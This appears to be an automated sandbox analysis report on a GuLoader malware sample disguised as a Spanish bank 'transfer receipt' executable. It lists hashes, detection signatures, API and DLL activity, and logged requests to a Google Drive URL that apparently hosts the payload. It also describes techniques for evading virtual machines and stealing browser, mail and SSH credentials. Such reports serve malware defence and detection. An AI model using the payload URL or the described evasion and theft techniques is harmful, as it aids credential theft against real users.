Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
comprobante de transferencia.exe

Overview

General Information

Sample name:comprobante de transferencia.exe
Analysis ID:1411000
MD5:8a1422827315b9db63cd6b399a454fab
SHA1:235c6e8149097f00ac26e70b0022c7b5a2f49c1d
SHA256:2d49a4fcfdf17af26d78ec4eea4eb75176ab9918c7644855d4d80454ce7382c0
Infos:

Detection

GuLoader
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.7701035769.0000000034211000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.2920518142.0000000005056000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: comprobante de transferencia.exe PID: 8496JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: comprobante de transferencia.exeAvira: detected
        Source: comprobante de transferencia.exeReversingLabs: Detection: 63%
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_36449100 CryptUnprotectData,2_2_36449100
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_364498F8 CryptUnprotectData,2_2_364498F8
        Source: comprobante de transferencia.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 142.251.40.142:443 -> 192.168.11.20:49784 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.41.1:443 -> 192.168.11.20:49785 version: TLS 1.2
        Source: comprobante de transferencia.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 0_2_0040635D FindFirstFileW,FindClose,0_2_0040635D
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040580B
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_0040635D FindFirstFileW,FindClose,2_2_0040635D
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_0040580B
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_004027FB FindFirstFileW,2_2_004027FB
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ZlWTWjrz48C7pJUuwTOgfOjeHFK1G_7k HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1ZlWTWjrz48C7pJUuwTOgfOjeHFK1G_7k&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ZlWTWjrz48C7pJUuwTOgfOjeHFK1G_7k HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1ZlWTWjrz48C7pJUuwTOgfOjeHFK1G_7k&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: unknownDNS traffic detected: queries for: drive.google.com
        Source: comprobante de transferencia.exeString found in binary or memory: http://crl.apple.com/root.crl0
        Source: comprobante de transferencia.exeString found in binary or memory: http://crl.apple.com/timestamp.crl0
        Source: comprobante de transferencia.exe, 00000002.00000003.2916893113.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A9B000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000003.2903958987.0000000003AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: comprobante de transferencia.exe, 00000002.00000003.2916893113.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A9B000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000003.2903958987.0000000003AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: comprobante de transferencia.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: comprobante de transferencia.exeString found in binary or memory: http://www.apple.com/appleca0
        Source: comprobante de transferencia.exe, 00000002.00000003.2916893113.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A9B000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000003.2903958987.0000000003AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: comprobante de transferencia.exe, 00000002.00000003.2903907971.0000000003AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/Ar=
        Source: comprobante de transferencia.exe, 00000002.00000002.7687982111.0000000005740000.00000004.00001000.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ZlWTWjrz48C7pJUuwTOgfOjeHFK1G_7k
        Source: comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ZlWTWjrz48C7pJUuwTOgfOjeHFK1G_7kfyQ
        Source: comprobante de transferencia.exe, 00000002.00000003.2916893113.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
        Source: comprobante de transferencia.exe, 00000002.00000003.2916893113.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A9B000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000003.2903907971.0000000003AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ZlWTWjrz48C7pJUuwTOgfOjeHFK1G_7k&export=download
        Source: comprobante de transferencia.exe, 00000002.00000003.2916893113.0000000003AA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ZlWTWjrz48C7pJUuwTOgfOjeHFK1G_7k&export=download/r
        Source: comprobante de transferencia.exe, 00000002.00000003.2916893113.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A9B000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000003.2903958987.0000000003AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: comprobante de transferencia.exe, 00000002.00000003.2903907971.0000000003AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: comprobante de transferencia.exeString found in binary or memory: https://www.apple.com/appleca/0
        Source: comprobante de transferencia.exe, 00000002.00000003.2903907971.0000000003AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: comprobante de transferencia.exe, 00000002.00000003.2903907971.0000000003AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: comprobante de transferencia.exe, 00000002.00000003.2903907971.0000000003AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: comprobante de transferencia.exe, 00000002.00000003.2903907971.0000000003AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
        Source: unknownHTTPS traffic detected: 142.251.40.142:443 -> 192.168.11.20:49784 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.41.1:443 -> 192.168.11.20:49785 version: TLS 1.2
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 0_2_004052B8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052B8
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040326A
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040326A
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 0_2_004066E20_2_004066E2
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 0_2_00404AF50_2_00404AF5
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_004066E22_2_004066E2
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_00404AF52_2_00404AF5
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_0015B0102_2_0015B010
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_0015D0F82_2_0015D0F8
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_0015A3F82_2_0015A3F8
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_001565302_2_00156530
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_001541A72_2_001541A7
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_001565222_2_00156522
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_0015A7402_2_0015A740
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_364432802_2_36443280
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_3644E2982_2_3644E298
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_3644F0782_2_3644F078
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_3644C1582_2_3644C158
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_364465F82_2_364465F8
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_36442E7A2_2_36442E7A
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_3644B3212_2_3644B321
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_3644A5802_2_3644A580
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_370551502_2_37055150
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_370541EA2_2_370541EA
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_37050D302_2_37050D30
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_370573602_2_37057360
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_370506482_2_37050648
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_3714B4E02_2_3714B4E0
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: String function: 00402BBF appears 51 times
        Source: comprobante de transferencia.exeStatic PE information: invalid certificate
        Source: comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs comprobante de transferencia.exe
        Source: comprobante de transferencia.exe, 00000002.00000002.7699759602.0000000034019000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs comprobante de transferencia.exe
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeSection loaded: wintypes.dllJump to behavior
        Source: comprobante de transferencia.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: classification engineClassification label: mal80.troj.spyw.evad.winEXE@3/9@2/2
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040326A
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040326A
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 0_2_00404579 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404579
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 0_2_00402095 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_00402095
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeFile created: C:\Users\user\Pictures\industrialisereJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeMutant created: NULL
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeFile created: C:\Users\user\AppData\Local\Temp\nss383C.tmpJump to behavior
        Source: comprobante de transferencia.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: comprobante de transferencia.exeReversingLabs: Detection: 63%
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeFile read: C:\Users\user\Desktop\comprobante de transferencia.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\comprobante de transferencia.exe C:\Users\user\Desktop\comprobante de transferencia.exe
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess created: C:\Users\user\Desktop\comprobante de transferencia.exe C:\Users\user\Desktop\comprobante de transferencia.exe
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess created: C:\Users\user\Desktop\comprobante de transferencia.exe C:\Users\user\Desktop\comprobante de transferencia.exeJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
        Source: comprobante de transferencia.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

        Data Obfuscation

        barindex
        Source: Yara matchFile source: 00000000.00000002.2920518142.0000000005056000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeCode function: 2_2_00150C6D push edi; retf 2_2_00150C7A
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeFile created: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\comprobante de transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
